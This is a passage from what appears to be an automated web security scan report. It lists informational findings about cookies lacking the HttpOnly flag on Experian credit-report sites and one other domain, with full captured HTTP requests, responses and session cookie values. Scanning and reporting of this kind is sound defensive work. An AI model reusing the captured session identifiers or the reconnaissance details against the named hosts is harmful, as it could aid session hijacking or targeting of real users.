Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=cdcegvypn3iopdndfus34r45; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20s_lv%3D1303676208988%7C1398284208988%3B%20s_lv_s%3DFirst%2520Visit%7C1303678008988%3B%20sc_dl%3D1%7C1303678023924%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%7C1303678023929%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303678023932%3B; s_sess=%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20sc_cp_channel%3D0%3B%20s_cc%3Dtrue%3B%20sc_gvl_sc%3D657900%3B%20sc_gvl_bcd%3D0%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Si_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:16:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default+s_code.axd+Order1; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:16:52 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=b9e50f6aa22f42ca81c3b1ebd91be07d; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24705

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           TripleAlert.com
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <meta nam
...[SNIP]...

18.461. https://www.experiandirect.com/triplealert/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/javascripts/s_code.axd HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 65895
Content-Type: text/javascript; charset=utf-8
Expires: Mon, 01 Jan 0001 00:00:00 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 12:49:26 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=76824b8ebe2b417d872294f2bff9ea80; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:49:26 GMT

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expitriplealertlive"

var
...[SNIP]...

18.462. http://www.fischerinternational.com/competencies/identity_management.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /competencies/identity_management.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /competencies/identity_management.htm HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/7.0
Content-Type: text/html
Date: Sun, 24 Apr 2011 19:45:39 GMT
Set-Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; path=/
X-Powered-By: ASP.NET
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

18.463. http://www.freecreditreport.com/Images/tracking_pixel_unload.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /Images/tracking_pixel_unload.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/tracking_pixel_unload.gif?q=99856488 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com
Cookie: s_vi=[CS]v1|26DA62F6851D24BE-40000107004A33F4[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 Jul 2007 20:55:41 GMT
ETag: "80c43607ec9c71:149b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:32:02 GMT
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
X-PvInfo: [S10203.C76613.A70591.RA0.G11456.U53DBB663].[OT/images.OG/images]

GIF89a.............!.......,...........D..;

18.464. http://www.freecreditreport.com/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:52:40 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=b7b9d72b5dd84946ab63439471579665; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:52:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:52:40 GMT
ETag: "pv5a563c6efc0292ef4fc55a85ca1b2742"
Expires: Wed, 27 Apr 2011 00:52:40 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.UEA0A428D].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 787

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpRegister
...[SNIP]...

18.465. http://www.freecreditreport.com/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx HTTP/1.1
Host: www.freecreditreport.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditreport.com/default.aspx?sc=670839&bcd=daB7KMjz&mkwid=sdaB7KMjz&pcrid=6283273924&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DA3ED6851D2621-40000127A02824B7[CE]; ASP.NET_SessionId=5i4x5z55fkh1glngnstwvieh; MachineName=IRC-P2WEB-32; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 5:34:34 PM; NavFlowID=1062; NumTrialDaysLeft=; UID=c352e00ced0845e98763eee3a868dd94; BIGipServerfreecreditreport-web-pool=176442890.37663.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditreport.com; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:34:42 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=1062; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:34:42 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:34:42 GMT
ETag: "pve75d6d194b3e863dff0fbd86df2d2624"
Expires: Wed, 27 Apr 2011 00:34:42 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.UEA0A428D].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 787

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpRegister
...[SNIP]...

18.466. http://www.freecreditreport.com/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com
Cookie: s_vi=[CS]v1|26DA62F6851D24BE-40000107004A33F4[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:53:17 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=e026b1624b4c4c218bcf9bb1eee1f080; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:53:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:53:17 GMT
ETag: "pv5eff78cc1e01649406078bd6d3d1172c"
Expires: Wed, 27 Apr 2011 00:53:17 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.UA4B9BC7F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 863

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

18.467. http://www.freecreditreport.com/ajaxpro/converter.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /ajaxpro/converter.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajaxpro/converter.ashx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:52:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:52:36 GMT
ETag: "pv8ea95aabb3fc433d0bb1f56dac1a3600"
Expires: Wed, 27 Apr 2011 00:52:36 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.U6ED674FC].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 4680

//--------------------------------------------------------------
// Copyright (C) 2006 Michael Schwarz (http://www.ajaxpro.info).
// All rights reserved.
//-----------------------------------------
...[SNIP]...

18.468. http://www.freecreditreport.com/ajaxpro/core.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /ajaxpro/core.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajaxpro/core.ashx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:52:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:52:32 GMT
ETag: "pv5a9edd79736886c5bf92c8a8378b89bb"
Expires: Wed, 27 Apr 2011 00:52:32 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.U2490971A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 14483

//--------------------------------------------------------------
// Copyright (C) 2006 Michael Schwarz (http://www.ajaxpro.info).
// All rights reserved.
//-----------------------------------------
...[SNIP]...

18.469. http://www.freecreditreport.com/ajaxpro/prototype.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /ajaxpro/prototype.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajaxpro/prototype.ashx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:52:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:52:31 GMT
ETag: "pv308d05a38d60fd88dd4f2e18019a8766"
Expires: Wed, 27 Apr 2011 00:52:31 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.U7DAA9F05].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 3766

//--------------------------------------------------------------
// Copyright (C) 2006 Michael Schwarz (http://www.ajaxpro.info).
// All rights reserved.
//-----------------------------------------
...[SNIP]...

18.470. http://www.freecreditreport.com/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascripts/s_code.axd HTTP/1.1
Host: www.freecreditreport.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditreport.com/default.aspx?sc=670839&bcd=daB7KMjz&mkwid=sdaB7KMjz&pcrid=6283273924&kwid=credit%20monitoring
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DA3ED6851D2621-40000127A02824B7[CE]; ASP.NET_SessionId=5i4x5z55fkh1glngnstwvieh; MachineName=IRC-P2WEB-32; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 5:34:34 PM; NavFlowID=1062; NumTrialDaysLeft=; UID=c352e00ced0845e98763eee3a868dd94; BIGipServerfreecreditreport-web-pool=176442890.37663.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=freecreditreport.com; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+s_code.axd; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:34:44 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=1062; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:34:44 GMT
ETag: "pv7108be31de3242966a2fd92e6e57593f"
Expires: Wed, 27 Apr 2011 00:34:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.U87C5DBB3].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65900

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expilive, expitrulyfree, expiglobal"

...[SNIP]...

18.471. http://www.freecreditreport.com/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditreport.com
Path:   /spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spacer.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 1143
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:31:29 GMT
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
X-PvInfo: [S10201.C76613.A70550.RA70594.G11456.UD19B949C].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

18.472. http://www.freecreditscore.com/dni/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditscore.com
Path:   /dni/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
